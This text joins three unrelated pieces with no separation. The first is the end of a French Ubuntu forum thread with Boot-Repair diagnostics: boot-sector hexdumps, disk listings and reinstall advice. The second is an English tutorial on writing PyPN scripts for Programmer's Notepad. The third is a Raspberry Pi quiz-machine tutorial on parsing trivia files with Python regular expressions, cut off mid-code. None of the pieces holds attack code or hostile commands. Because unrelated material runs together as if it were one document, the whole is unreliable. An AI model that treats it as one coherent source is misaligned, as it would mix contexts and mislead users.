3.....| 00000060 7b 8e c1 8e d9 bd 00 7c 88 56 40 88 4e 02 8a 56 |{......|[email protected]| 00000070 40 b4 41 bb aa 55 cd 13 72 10 81 fb 55 aa 75 0a |@.A..U..r...U.u.| 00000080 f6 c1 01 74 05 fe 46 02 eb 2d 8a 56 40 b4 08 cd |...t..F..-.V@...| 00000090 13 73 05 b9 ff ff 8a f1 66 0f b6 c6 40 66 0f b6 |.s......f...@f..| 000000a0 d1 80 e2 3f f7 e2 86 cd c0 ed 06 41 66 0f b7 c9 |...?.......Af...| 000000b0 66 f7 e1 66 89 46 f8 83 7e 16 00 75 39 83 7e 2a |f..f.F..~..u9.~*| 000000c0 00 77 33 66 8b 46 1c 66 83 c0 0c bb 00 80 b9 01 |.w3f.F.f........| 000000d0 00 e8 2c 00 e9 a8 03 a1 f8 7d 80 c4 7c 8b f0 ac |..,......}..|...| 000000e0 84 c0 74 17 3c ff 74 09 b4 0e bb 07 00 cd 10 eb |..t.<.t.........| 000000f0 ee a1 fa 7d eb e4 a1 7d 80 eb df 98 cd 16 cd 19 |...}...}........| 00000100 66 60 80 7e 02 00 0f 84 20 00 66 6a 00 66 50 06 |f`.~.... .fj.fP.| 00000110 53 66 68 10 00 01 00 b4 42 8a 56 40 8b f4 cd 13 |Sfh.....B.V@....| 00000120 66 58 66 58 66 58 66 58 eb 33 66 3b 46 f8 72 03 |fXfXfXfX.3f;F.r.| 00000130 f9 eb 2a 66 33 d2 66 0f b7 4e 18 66 f7 f1 fe c2 |..*f3.f..N.f....| 00000140 8a ca 66 8b d0 66 c1 ea 10 f7 76 1a 86 d6 8a 56 |..f..f....v....V| 00000150 40 8a e8 c0 e4 06 0a cc b8 01 02 cd 13 66 61 0f |@............fa.| 00000160 82 74 ff 81 c3 00 02 66 40 49 75 94 c3 42 4f 4f |[email protected]| 00000170 54 4d 47 52 20 20 20 20 00 00 00 00 00 00 00 00 |TMGR ........| 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000001a0 00 00 00 00 00 00 00 00 00 00 00 00 0d 0a 44 69 |..............Di| 000001b0 73 6b 20 65 72 72 6f 72 ff 0d 0a 50 72 65 73 73 |sk error...Press| 000001c0 20 61 6e 79 20 6b 65 79 20 74 6f 20 72 65 73 74 | any key to rest| 000001d0 61 72 74 0d 0a 00 00 00 00 00 00 00 00 00 00 00 |art.............| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001f0 00 00 00 00 00 00 00 00 ac 01 b9 01 00 00 55 aa |..............U.| 00000200 =================== hexdump -n512 -C /dev/sda4 00000000 eb 52 90 4e 54 46 53 20 20 20 20 00 02 08 00 00 |.R.NTFS .....| 00000010 00 00 00 00 00 f8 00 00 3f 00 ff 00 00 00 1d 00 |........?.......| 00000020 00 00 00 00 80 00 80 00 ff ff ff 18 00 00 00 00 |................| 00000030 00 00 0c 00 00 00 00 00 02 00 00 00 00 00 00 00 |................| 00000040 f6 00 00 00 01 00 00 00 41 fa 1b 4a 12 1c 4a ca |........A..J..J.| 00000050 00 00 00 00 fa 33 c0 8e d0 bc 00 7c fb 68 c0 07 |.....3.....|.h..| 00000060 1f 1e 68 66 00 cb 88 16 0e 00 66 81 3e 03 00 4e |..hf......f.>..N| 00000070 54 46 53 75 15 b4 41 bb aa 55 cd 13 72 0c 81 fb |TFSu..A..U..r...| 00000080 55 aa 75 06 f7 c1 01 00 75 03 e9 dd 00 1e 83 ec |U.u.....u.......| 00000090 18 68 1a 00 b4 48 8a 16 0e 00 8b f4 16 1f cd 13 |.h...H..........| 000000a0 9f 83 c4 18 9e 58 1f 72 e1 3b 06 0b 00 75 db a3 |.....X.r.;...u..| 000000b0 0f 00 c1 2e 0f 00 04 1e 5a 33 db b9 00 20 2b c8 |........Z3... +.| 000000c0 66 ff 06 11 00 03 16 0f 00 8e c2 ff 06 16 00 e8 |f...............| 000000d0 4b 00 2b c8 77 ef b8 00 bb cd 1a 66 23 c0 75 2d |K.+.w......f#.u-| 000000e0 66 81 fb 54 43 50 41 75 24 81 f9 02 01 72 1e 16 |f..TCPAu$....r..| 000000f0 68 07 bb 16 68 52 11 16 68 09 00 66 53 66 53 66 |h...hR..h..fSfSf| 00000100 55 16 16 16 68 b8 01 66 61 0e 07 cd 1a 33 c0 bf |U...h..fa....3..| 00000110 0a 13 b9 f6 0c fc f3 aa e9 fe 01 90 90 66 60 1e |.............f`.| 00000120 06 66 a1 11 00 66 03 06 1c 00 1e 66 68 00 00 00 |.f...f.....fh...| 00000130 00 66 50 06 53 68 01 00 68 10 00 b4 42 8a 16 0e |.fP.Sh..h...B...| 00000140 00 16 1f 8b f4 cd 13 66 59 5b 5a 66 59 66 59 1f |.......fY[ZfYfY.| 00000150 0f 82 16 00 66 ff 06 11 00 03 16 0f 00 8e c2 ff |....f...........| 00000160 0e 16 00 75 bc 07 1f 66 61 c3 a1 f6 01 e8 09 00 |...u...fa.......| 00000170 a1 fa 01 e8 03 00 f4 eb fd 8b f0 ac 3c 00 74 09 |............<.t.| 00000180 b4 0e bb 07 00 cd 10 eb f2 c3 0d 0a 41 20 64 69 |............A di| 00000190 73 6b 20 72 65 61 64 20 65 72 72 6f 72 20 6f 63 |sk read error oc| 000001a0 63 75 72 72 65 64 00 0d 0a 42 4f 4f 54 4d 47 52 |curred...BOOTMGR| 000001b0 20 69 73 20 63 6f 6d 70 72 65 73 73 65 64 00 0d | is compressed..| 000001c0 0a 50 72 65 73 73 20 43 74 72 6c 2b 41 6c 74 2b |.Press Ctrl+Alt+| 000001d0 44 65 6c 20 74 6f 20 72 65 73 74 61 72 74 0d 0a |Del to restart..| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001f0 00 00 00 00 00 00 8a 01 a7 01 bf 01 00 00 55 aa |..............U.| 00000200 =================== hexdump -n512 -C /dev/sda5 00000000 eb 52 90 4e 54 46 53 20 20 20 20 00 02 08 00 00 |.R.NTFS .....| 00000010 00 00 00 00 00 f8 00 00 3f 00 ff 00 00 58 3c 54 |........?....X<T| 00000020 00 00 00 00 80 00 80 00 ff e7 0a 00 00 00 00 00 |................| 00000030 55 74 00 00 00 00 00 00 02 00 00 00 00 00 00 00 |Ut..............| 00000040 f6 00 00 00 01 00 00 00 cb 60 b0 34 8c b0 34 a6 |.........`.4..4.| 00000050 00 00 00 00 fa 33 c0 8e d0 bc 00 7c fb 68 c0 07 |.....3.....|.h..| 00000060 1f 1e 68 66 00 cb 88 16 0e 00 66 81 3e 03 00 4e |..hf......f.>..N| 00000070 54 46 53 75 15 b4 41 bb aa 55 cd 13 72 0c 81 fb |TFSu..A..U..r...| 00000080 55 aa 75 06 f7 c1 01 00 75 03 e9 dd 00 1e 83 ec |U.u.....u.......| 00000090 18 68 1a 00 b4 48 8a 16 0e 00 8b f4 16 1f cd 13 |.h...H..........| 000000a0 9f 83 c4 18 9e 58 1f 72 e1 3b 06 0b 00 75 db a3 |.....X.r.;...u..| 000000b0 0f 00 c1 2e 0f 00 04 1e 5a 33 db b9 00 20 2b c8 |........Z3... +.| 000000c0 66 ff 06 11 00 03 16 0f 00 8e c2 ff 06 16 00 e8 |f...............| 000000d0 4b 00 2b c8 77 ef b8 00 bb cd 1a 66 23 c0 75 2d |K.+.w......f#.u-| 000000e0 66 81 fb 54 43 50 41 75 24 81 f9 02 01 72 1e 16 |f..TCPAu$....r..| 000000f0 68 07 bb 16 68 52 11 16 68 09 00 66 53 66 53 66 |h...hR..h..fSfSf| 00000100 55 16 16 16 68 b8 01 66 61 0e 07 cd 1a 33 c0 bf |U...h..fa....3..| 00000110 0a 13 b9 f6 0c fc f3 aa e9 fe 01 90 90 66 60 1e |.............f`.| 00000120 06 66 a1 11 00 66 03 06 1c 00 1e 66 68 00 00 00 |.f...f.....fh...| 00000130 00 66 50 06 53 68 01 00 68 10 00 b4 42 8a 16 0e |.fP.Sh..h...B...| 00000140 00 16 1f 8b f4 cd 13 66 59 5b 5a 66 59 66 59 1f |.......fY[ZfYfY.| 00000150 0f 82 16 00 66 ff 06 11 00 03 16 0f 00 8e c2 ff |....f...........| 00000160 0e 16 00 75 bc 07 1f 66 61 c3 a1 f6 01 e8 09 00 |...u...fa.......| 00000170 a1 fa 01 e8 03 00 f4 eb fd 8b f0 ac 3c 00 74 09 |............<.t.| 00000180 b4 0e bb 07 00 cd 10 eb f2 c3 0d 0a 45 72 72 65 |............Erre| 00000190 75 72 20 6c 65 63 74 75 72 65 20 64 69 73 71 75 |ur lecture disqu| 000001a0 65 00 0d 0a 42 4f 4f 54 4d 47 52 20 63 6f 6d 70 |e...BOOTMGR comp| 000001b0 72 65 73 73 82 00 0d 0a 43 74 72 6c 2b 41 6c 74 |ress....Ctrl+Alt| 000001c0 2b 53 75 70 70 72 20 70 6f 75 72 20 72 65 64 82 |+Suppr pour red.| 000001d0 6d 61 72 72 65 72 0d 0a 00 73 74 61 72 74 0d 0a |marrer...start..| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001f0 00 00 00 00 00 00 8a 01 a2 01 b6 01 00 00 55 aa |..............U.| 00000200 =================== hexdump -n512 -C /dev/sda6 00000000 eb 52 90 4e 54 46 53 20 20 20 20 00 02 08 00 00 |.R.NTFS .....| 00000010 00 00 00 00 00 f8 00 00 3f 00 ff 00 00 c8 35 22 |........?.....5"| 00000020 00 00 00 00 80 00 80 00 ff 1f ed 02 00 00 00 00 |................| 00000030 00 00 0c 00 00 00 00 00 02 00 00 00 00 00 00 00 |................| 00000040 f6 00 00 00 01 00 00 00 e2 f6 f7 f2 27 f8 f2 68 |............'..h| 00000050 00 00 00 00 fa 33 c0 8e d0 bc 00 7c fb 68 c0 07 |.....3.....|.h..| 00000060 1f 1e 68 66 00 cb 88 16 0e 00 66 81 3e 03 00 4e |..hf......f.>..N| 00000070 54 46 53 75 15 b4 41 bb aa 55 cd 13 72 0c 81 fb |TFSu..A..U..r...| 00000080 55 aa 75 06 f7 c1 01 00 75 03 e9 dd 00 1e 83 ec |U.u.....u.......| 00000090 18 68 1a 00 b4 48 8a 16 0e 00 8b f4 16 1f cd 13 |.h...H..........| 000000a0 9f 83 c4 18 9e 58 1f 72 e1 3b 06 0b 00 75 db a3 |.....X.r.;...u..| 000000b0 0f 00 c1 2e 0f 00 04 1e 5a 33 db b9 00 20 2b c8 |........Z3... +.| 000000c0 66 ff 06 11 00 03 16 0f 00 8e c2 ff 06 16 00 e8 |f...............| 000000d0 4b 00 2b c8 77 ef b8 00 bb cd 1a 66 23 c0 75 2d |K.+.w......f#.u-| 000000e0 66 81 fb 54 43 50 41 75 24 81 f9 02 01 72 1e 16 |f..TCPAu$....r..| 000000f0 68 07 bb 16 68 52 11 16 68 09 00 66 53 66 53 66 |h...hR..h..fSfSf| 00000100 55 16 16 16 68 b8 01 66 61 0e 07 cd 1a 33 c0 bf |U...h..fa....3..| 00000110 0a 13 b9 f6 0c fc f3 aa e9 fe 01 90 90 66 60 1e |.............f`.| 00000120 06 66 a1 11 00 66 03 06 1c 00 1e 66 68 00 00 00 |.f...f.....fh...| 00000130 00 66 50 06 53 68 01 00 68 10 00 b4 42 8a 16 0e |.fP.Sh..h...B...| 00000140 00 16 1f 8b f4 cd 13 66 59 5b 5a 66 59 66 59 1f |.......fY[ZfYfY.| 00000150 0f 82 16 00 66 ff 06 11 00 03 16 0f 00 8e c2 ff |....f...........| 00000160 0e 16 00 75 bc 07 1f 66 61 c3 a1 f6 01 e8 09 00 |...u...fa.......| 00000170 a1 fa 01 e8 03 00 f4 eb fd 8b f0 ac 3c 00 74 09 |............<.t.| 00000180 b4 0e bb 07 00 cd 10 eb f2 c3 0d 0a 41 20 64 69 |............A di| 00000190 73 6b 20 72 65 61 64 20 65 72 72 6f 72 20 6f 63 |sk read error oc| 000001a0 63 75 72 72 65 64 00 0d 0a 42 4f 4f 54 4d 47 52 |curred...BOOTMGR| 000001b0 20 69 73 20 63 6f 6d 70 72 65 73 73 65 64 00 0d | is compressed..| 000001c0 0a 50 72 65 73 73 20 43 74 72 6c 2b 41 6c 74 2b |.Press Ctrl+Alt+| 000001d0 44 65 6c 20 74 6f 20 72 65 73 74 61 72 74 0d 0a |Del to restart..| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001f0 00 00 00 00 00 00 8a 01 a7 01 bf 01 00 00 55 aa |..............U.| 00000200 ls /mnt/boot-sav/sda7/1: ls /mnt/boot-sav/sda7: bg-bg Boot bootmgr bootmgr.efi cs-cz da-dk de-de EFI el-gr en-gb en-us es-es et-ee fi-fi fr-fr hr-hr hu-hu it-it ja-jp ko-kr lt-lt lv-lv nb-no nl-nl pl-pl pt-br pt-pt $RECYCLE.BIN ro-ro ru-ru sk-sk sl-si sources sr-latn-cs sv-se tr-tr uk-ua WinClon zh-cn zh-hk zh-tw . Veuillez indiquer ce message à [email protected] =================== hexdump -n512 -C /dev/sda7 00000000 eb 58 90 4d 53 44 4f 53 35 2e 30 00 02 08 0e 10 |.X.MSDOS5.0.....| 00000010 02 00 00 00 00 f8 00 00 3f 00 ff 00 00 e8 22 25 |........?....."%| 00000020 00 00 20 00 f9 07 00 00 00 00 00 00 02 00 00 00 |.. .............| 00000030 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000040 80 01 29 2c 12 1f 76 4e 4f 20 4e 41 4d 45 20 20 |..),..vNO NAME | 00000050 20 20 46 41 54 33 32 20 20 20 33 c9 8e d1 bc f4 | FAT32 3.....| 00000060 7b 8e c1 8e d9 bd 00 7c 88 56 40 88 4e 02 8a 56 |{......|[email protected]| 00000070 40 b4 41 bb aa 55 cd 13 72 10 81 fb 55 aa 75 0a |@.A..U..r...U.u.| 00000080 f6 c1 01 74 05 fe 46 02 eb 2d 8a 56 40 b4 08 cd |...t..F..-.V@...| 00000090 13 73 05 b9 ff ff 8a f1 66 0f b6 c6 40 66 0f b6 |.s......f...@f..| 000000a0 d1 80 e2 3f f7 e2 86 cd c0 ed 06 41 66 0f b7 c9 |...?.......Af...| 000000b0 66 f7 e1 66 89 46 f8 83 7e 16 00 75 39 83 7e 2a |f..f.F..~..u9.~*| 000000c0 00 77 33 66 8b 46 1c 66 83 c0 0c bb 00 80 b9 01 |.w3f.F.f........| 000000d0 00 e8 2c 00 e9 a8 03 a1 f8 7d 80 c4 7c 8b f0 ac |..,......}..|...| 000000e0 84 c0 74 17 3c ff 74 09 b4 0e bb 07 00 cd 10 eb |..t.<.t.........| 000000f0 ee a1 fa 7d eb e4 a1 7d 80 eb df 98 cd 16 cd 19 |...}...}........| 00000100 66 60 80 7e 02 00 0f 84 20 00 66 6a 00 66 50 06 |f`.~.... .fj.fP.| 00000110 53 66 68 10 00 01 00 b4 42 8a 56 40 8b f4 cd 13 |Sfh.....B.V@....| 00000120 66 58 66 58 66 58 66 58 eb 33 66 3b 46 f8 72 03 |fXfXfXfX.3f;F.r.| 00000130 f9 eb 2a 66 33 d2 66 0f b7 4e 18 66 f7 f1 fe c2 |..*f3.f..N.f....| 00000140 8a ca 66 8b d0 66 c1 ea 10 f7 76 1a 86 d6 8a 56 |..f..f....v....V| 00000150 40 8a e8 c0 e4 06 0a cc b8 01 02 cd 13 66 61 0f |@............fa.| 00000160 82 74 ff 81 c3 00 02 66 40 49 75 94 c3 42 4f 4f |[email protected]| 00000170 54 4d 47 52 20 20 20 20 00 00 00 00 00 00 00 00 |TMGR ........| 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000001a0 00 00 00 00 00 00 00 00 00 00 00 00 0d 0a 44 69 |..............Di| 000001b0 73 6b 20 65 72 72 6f 72 ff 0d 0a 50 72 65 73 73 |sk error...Press| 000001c0 20 61 6e 79 20 6b 65 79 20 74 6f 20 72 65 73 74 | any key to rest| 000001d0 61 72 74 0d 0a 00 00 00 00 00 00 00 00 00 00 00 |art.............| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001f0 00 00 00 00 00 00 00 00 ac 01 b9 01 00 00 55 aa |..............U.| 00000200 =================== hexdump -n512 -C /dev/sda8 00000000 eb 52 90 4e 54 46 53 20 20 20 20 00 02 08 00 00 |.R.NTFS .....| 00000010 00 00 00 00 00 f8 00 00 3f 00 ff 00 00 00 1d 19 |........?.......| 00000020 00 00 00 00 80 00 80 00 ff ff 7f 36 00 00 00 00 |...........6....| 00000030 04 00 00 00 00 00 00 00 ff ff 67 03 00 00 00 00 |..........g.....| 00000040 f6 00 00 00 01 00 00 00 5b 11 14 37 f9 69 54 0b |........[..7.iT.| 00000050 00 00 00 00 fa 33 c0 8e d0 bc 00 7c fb 68 c0 07 |.....3.....|.h..| 00000060 1f 1e 68 66 00 cb 88 16 0e 00 66 81 3e 03 00 4e |..hf......f.>..N| 00000070 54 46 53 75 15 b4 41 bb aa 55 cd 13 72 0c 81 fb |TFSu..A..U..r...| 00000080 55 aa 75 06 f7 c1 01 00 75 03 e9 d2 00 1e 83 ec |U.u.....u.......| 00000090 18 68 1a 00 b4 48 8a 16 0e 00 8b f4 16 1f cd 13 |.h...H..........| 000000a0 9f 83 c4 18 9e 58 1f 72 e1 3b 06 0b 00 75 db a3 |.....X.r.;...u..| 000000b0 0f 00 c1 2e 0f 00 04 1e 5a 33 db b9 00 20 2b c8 |........Z3... +.| 000000c0 66 ff 06 11 00 03 16 0f 00 8e c2 ff 06 16 00 e8 |f...............| 000000d0 40 00 2b c8 77 ef b8 00 bb cd 1a 66 23 c0 75 2d |@.+.w......f#.u-| 000000e0 66 81 fb 54 43 50 41 75 24 81 f9 02 01 72 1e 16 |f..TCPAu$....r..| 000000f0 68 07 bb 16 68 70 0e 16 68 09 00 66 53 66 53 66 |h...hp..h..fSfSf| 00000100 55 16 16 16 68 b8 01 66 61 0e 07 cd 1a e9 6a 01 |U...h..fa.....j.| 00000110 90 90 66 60 1e 06 66 a1 11 00 66 03 06 1c 00 1e |..f`..f...f.....| 00000120 66 68 00 00 00 00 66 50 06 53 68 01 00 68 10 00 |fh....fP.Sh..h..| 00000130 b4 42 8a 16 0e 00 16 1f 8b f4 cd 13 66 59 5b 5a |.B..........fY[Z| 00000140 66 59 66 59 1f 0f 82 16 00 66 ff 06 11 00 03 16 |fYfY.....f......| 00000150 0f 00 8e c2 ff 0e 16 00 75 bc 07 1f 66 61 c3 a0 |........u...fa..| 00000160 f8 01 e8 08 00 a0 fb 01 e8 02 00 eb fe b4 01 8b |................| 00000170 f0 ac 3c 00 74 09 b4 0e bb 07 00 cd 10 eb f2 c3 |..<.t...........| 00000180 0d 0a 41 20 64 69 73 6b 20 72 65 61 64 20 65 72 |..A disk read er| 00000190 72 6f 72 20 6f 63 63 75 72 72 65 64 00 0d 0a 42 |ror occurred...B| 000001a0 4f 4f 54 4d 47 52 20 69 73 20 6d 69 73 73 69 6e |OOTMGR is missin| 000001b0 67 00 0d 0a 42 4f 4f 54 4d 47 52 20 69 73 20 63 |g...BOOTMGR is c| 000001c0 6f 6d 70 72 65 73 73 65 64 00 0d 0a 50 72 65 73 |ompressed...Pres| 000001d0 73 20 43 74 72 6c 2b 41 6c 74 2b 44 65 6c 20 74 |s Ctrl+Alt+Del t| 000001e0 6f 20 72 65 73 74 61 72 74 0d 0a 00 00 00 00 00 |o restart.......| 000001f0 00 00 00 00 00 00 00 00 80 9d b2 ca 00 00 55 aa |..............U.| 00000200 WARNING: GPT (GUID Partition Table) detected on '/dev/sda'! The util fdisk doesn't support GPT. Use GNU Parted. =================== df -Th: Filesystem Type Size Used Avail Use% Mounted on /dev/sda9 ext4 31G 6.3G 23G 22% / none tmpfs 4.0K 0 4.0K 0% /sys/fs/cgroup udev devtmpfs 1.9G 12K 1.9G 1% /dev tmpfs tmpfs 383M 1.1M 382M 1% /run none tmpfs 5.0M 0 5.0M 0% /run/lock none tmpfs 1.9G 224K 1.9G 1% /run/shm none tmpfs 100M 48K 100M 1% /run/user /dev/sda2 vfat 296M 47M 250M 16% /boot/efi /dev/sda8 fuseblk 436G 131G 306G 31% /media/raphael/D /dev/sda1 fuseblk 499M 344M 156M 69% /mnt/boot-sav/sda1 /dev/sda4 fuseblk 200G 109G 92G 55% /mnt/boot-sav/sda4 /dev/sda5 fuseblk 349M 341M 8.2M 98% /mnt/boot-sav/sda5 /dev/sda6 fuseblk 24G 23G 1017M 96% /mnt/boot-sav/sda6 /dev/sda7 vfat 1020M 610M 411M 60% /mnt/boot-sav/sda7 =================== fdisk -l: Disk /dev/sda: 750.2 GB, 750156374016 bytes 256 heads, 63 sectors/track, 90845 cylinders, total 1465149168 sectors Units = sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 4096 bytes I/O size (minimum/optimal): 4096 bytes / 4096 bytes Disk identifier: 0x2d0f061f Device Boot Start End Blocks Id System /dev/sda1 1 4294967295 2147483647+ ee GPT Partition 1 does not start on physical sector boundary. EFI détecté. Veuillez vérifier les options. =================== Final advice in case of recommended repair N'oubliez pas de régler votre BIOS pour qu'il amorce sur le fichier sda2/efi/.../grub*.efi ! Les fichiers de démarrage de [L'OS actuellement utilisé - Ubuntu 13.10] sont loin du début du disque. Votre BIOS pourrait ne pas les détecter. Vous voudrez peut-être re-essayer après avoir créé une partition /boot (EXT4, >200MB, en début de disque). Cela peut être réalisé via des outils tels que gParted. Puis sélectionnez cette partition via l'option [Partition /boot séparée :] de [Réparateur de démarrage]. (http://doc.ubuntu-fr.org/tutoriel/partition_boot) Vous souhaiterez peut-être ré-essayer après avoir activé l'option [Sauvegarder et renommer les fichiers EFI Windows]. =================== Default settings Recommended-Repair This setting would reinstall the grub-efi-amd64-signed of sda9, using the following options: sda2/boot/efi, Additional repair would be performed: unhide-bootmenu-10s fix-windows-boot =================== Settings chosen by the user Boot-Info This setting will not act on the MBR. Aucun changement n'a été effectué sur cet ordinateur. Si tu dois réinstaller(*), prends "Autre chose" à l'étape 3 de l'installation et contente-toi de modifier la partition sda9 pour dire que tu veux la formater et qu'elle soit ta partition racine. Ne touche pas aux autres partitions et ne te fatigue pas à sélectionner quelque chose pour le chargeur d'amorçage parce que l'installateur ne s'en sert pas (quelque soit ce que tu sélectionnes, ça n'est pas pris en compte dans le cas d'une installation en mode EFI comme la tienne). (*) ou si tu dois installer Ubuntu 14.04 à la place de Ubuntu 13.10 Dernière modification par malbo (Le 03/04/2014, à 17:39) MedionPC MT5 MED MT 162 / pentium IV / RAM 1Go / Radeon HD 3450 AGP / XP, HandyLinux et Xubuntu 14.04 32 bits Acer Aspire M5100-5F7N / Phenom Quad Core 9500 / ATI HD 2600 pro / RAM 4 Go / Win8, XP et Ubuntu 14.04 Hors ligne Raze Re : [Résolu] Conseils partition Ok, merci ! Et une idée pourquoi j'ai plus "Paramètre système" ? Des paquets desinstallés ? Par curiosité Du coup je vais passer en résolu, merci de votre aide Hors ligne malbo Re : [Résolu] Conseils partition Et une idée pourquoi j'ai plus "Paramètre système" ? Des paquets desinstallés ? Par curiosité Je ne sais pas. MedionPC MT5 MED MT 162 / pentium IV / RAM 1Go / Radeon HD 3450 AGP / XP, HandyLinux et Xubuntu 14.04 32 bits Acer Aspire M5100-5F7N / Phenom Quad Core 9500 / ATI HD 2600 pro / RAM 4 Go / Win8, XP et Ubuntu 14.04 Hors ligne
PyPN is an extension that allows you to use Python to script almost anything in PN. This can be simple text formatting, or complex macros for automation. See Install PyPN for installation instructions. After PyPN is installed, go to View > Window > Scripts (or press Alt+F10). You should be able to see the Scripts menu, with the sample scripts listed. Double click on a line in the Scripts window to run that script. To edit the scripts, go to "\Program Files\Programmer's Notepad\Scripts" and look at text.py. There you'll see the source code for the sample scripts, and you can add your own. You may have to restart PN to show changes. The PyPN extension makes it pretty easy to add your own features to Programmer's Notepad. PyPN exposes the underlying Scintilla interface to Python and this results in a very powerful scripting ability. The PyPN programmer has the PN objects, Scintilla editor, and the entire installed Python library ready for import. To begin, start by creating a new document and selecting the "Python" scheme. Once the scheme is set to Python type pnscriptfile into the document, then press Ctrl+Alt+Space. This should auto-fill the document with this basic code template: ############################################################################### ## Script description ## By: your name here import pn import scintilla from pypn.decorators import script @script() def (): """ What this does """ pass The top part of the file is a header area where you can fill in some information about your script, which may help should you decide to share your script or refer back to it at some point in the future. The next few lines are the standard imports needed for most PyPN scripts. These will give you access to the pn library, the scintilla library, and will expose the @script() decorator that you can see on the next line down. The script decorator allows PN to parse out some meta-data from the script file that lets your script appear in the list of scripts on the Scripts window (Alt+F10). Generally this would have the syntax: @script("Script Name", "Group") However if this is left blank it will default to the name of the method for "Script Name" and will put the script in the "Python" group. The next line is where you define you method. In this case lets create the method HelloPN. ############################################################################### ## Hello Programmer's Notepad ## By: PyPN Programmer import pn import scintilla from pypn.decorators import script @script() def HelloPN(): """ Say Hello To Programmer's Notepad """ newDoc = pn.NewDocument(None) editor = scintilla.Scintilla(newDoc) message = "Hello Programmer's Notepad!" editor.BeginUndoAction() editor.AppendText(len(message), message) editor.EndUndoAction() pass Save this file as HelloPN.py inside of the <Programmers Notepad Home Dir>\scripts directory. Once saved, exit Programmer's Notepad and restart. When you bring up the scripts window you should see a new script under the Python group. Double clicking on this script will run it. If you do not see the script, then look in the output window for a Python error which may help you in determining what went wrong. Taking a look at the method just defined: python""" Say Hello To Programmer's Notepad """ The three quotes on an empty line begins a documentation comment. So this line aids in documenting what the script does. pythonnewDoc = pn.NewDocument(None) This line instructs PN to create a new document with no schema. Had we used pn.NewDocument("Python") we would have created a new Python document. Had we used pn.CurrentDoc() we not have created a new document but found a reference to the current document -- allowing us to append our message to the end of whatever document was currently selected. pythoneditor = scintilla.Scintilla(newDoc) To edit documents we need access to the Scintilla interface. This line creates a Scintilla editor object for the document we just created. We need an editor object to access the text of a document. pythonmessage = "Hello Programmer's Notepad!" This created a string with our message text in it. We will use this string to insert our message into the document. pythoneditor.BeginUndoAction() It is never any fun when an editor preforms an action that cannot be undone. This line will establish an "undo point" so that the user can undo the operation that our script did to the document. The user will be able to undo any operations preformed between this point and when the EndUndoAction() is called. In this case, pressing Ctrl-Z on the new document should remove our message. pythoneditor.AppendText(len(message), message) This line will append our message to the end of the document. The AppendText(len, text) function takes two arguments. The first parameter is the number of characters you would like it to take from the text string provided in the second parameter. pythoneditor.EndUndoAction() This line will mark and end of undo operations. It is advisable to ensure that you always make changes to documents inside of an undo block so that the user can revert any changes should they be disappointed in the results. pass This line has no effect. The pass statement in Python has no operation and is merely used as a place holder or marker. In this case it serves as a marker for the end of the current function. It can be removed with no effect upon the functionality or logic of the code. For a list of user generated scripts please see the List of User-Submitted PyPN Scripts. The PyPN API pages.
PiQuizMachinecode. The machine The PiQuizMachine The Circuit Each button controller is made from 1/2" PVC parts and a momentary mini push button, connected by a wire to a board. On the board, one 10K Ohm resistor pulls up the GPIO to high, while the push button is connected to the GPIO on one end and to ground through a 1K Ohm resistor on the other end. This last resistor is optional if you are certainyou can avoid pressing the buttons whenever the GPIOs are configured as outputs instead of inputs... This circuit is repeated for all 4 buttons Source Code Make sure you've installed Mercurial and pulled the code from bitbucket (as instructed in the previous article), and go into: $ cd fablocker/PyHack/workshop01 $ cd trivia $ ls load.py piquiz.py piquizmachine.py questions.txt README.md short.txt The load.pyis the first piece of code we will review. We have a text file (question.txt) with all the questions and answers for the quiz game. We generated this file using a python script to web-scrape the data from a few pages of triviachamp.com (you can also do this by hand, selecting all the questions on a screen, and copy-pasting into a text file). There is also a shorter version, with 2 questions / answers. We will use that first to figure out how we will load them into memory in our program. Here is the content of short.txt: Louis Leterrier - This film was released in 2010.Who directed Clash of the Titans? a. Rodrigo Garcia b. Louis Leterrier c. Joe Carnahan d. Iain Softley Chicago - This team is part of the NFL.If you wanted to see the Bears play football, which city would you need to visit? a. Chicago b. Houston c. San Diego d. Denver Wow... So what do we have here? We do not have the data nicely separated by a special delimiter or by a new line. We will have to figure out a way to ignore the blank lines, handle the slight variations and extract the data into various fields: answer-trivia blah blah.question blah blah? multiple choices of answers The thing is, the trivia and question can have all kinds of punctuation marks such as comma, period, dash and varying amount of white spaces. Doing this by hand coding a function to do it would be a lot of work and quite boring. There is something that can deal with this fairly easily. I'm referring again to Python's "batteries included", a library called re, for Regular Expressions. Regular Expressions Regular Expressions ( abbreviated as re, regex or regexp), is a language designed to create simple to complex matching against data ( a string or a file). It is about as much the opposite to Python as can be, as it is dense, hard to read and hard to debug. But sometimes, it is the perfect solution to a problem, and it is fairly easy to use in the Python implementation (a full implementation on Python, just like in Perl - in some other languages, it is a partial implementation, and can be hard to use or at least way more involved). At any rate, if you ever have a career in IT, chances are you will have to become familiar with them, from system administrators wanting to parse log files, to programmers doing EDI, to web developers doing URL matching ( Django, Web.py, even config files for certain web servers), to loading and extracting data from a file that is not 100% structured to be read by a computer (as we will do here). The official documentation of the remodule can be found at docs.python.org A quick cheat sheet on regular expressions can be found here at tartley.com And for those who like to follow video tutorials, check out this google video tutorial by Nick Parlante, on youtube. Let's now look at the code in load.py: 1: #!/usr/bin/env python 2: # -*- coding: utf-8 -*- 3: """ 4: load.py - just loading the question file 5: Loads questions and answers from quiz data file. It follows the format 6: from triviachamp.com 7: """ 8: # vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4 9: 10: import re 11: 12: with open('short.txt', 'r') as f: 13: for line in f: 14: if len(line) > 1: 15: match = re.search(r'^([\w ]+)-([\w ,-]+)\.(.+)', line) 16: if match: 17: answer = match.group(1).strip() 18: trivia = match.group(2).strip() 19: question = match.group(3).strip() 20: choices = [] 21: else: 22: match = re.search(r'\s+(\w)\.([\w ,-]+)', line) 23: if match: 24: choices.append(match.group().strip()) 25: choice = match.group(1) 26: description = match.group(2).strip() 27: if description == answer: 28: correct_response = choice 29: if choice == 'd': 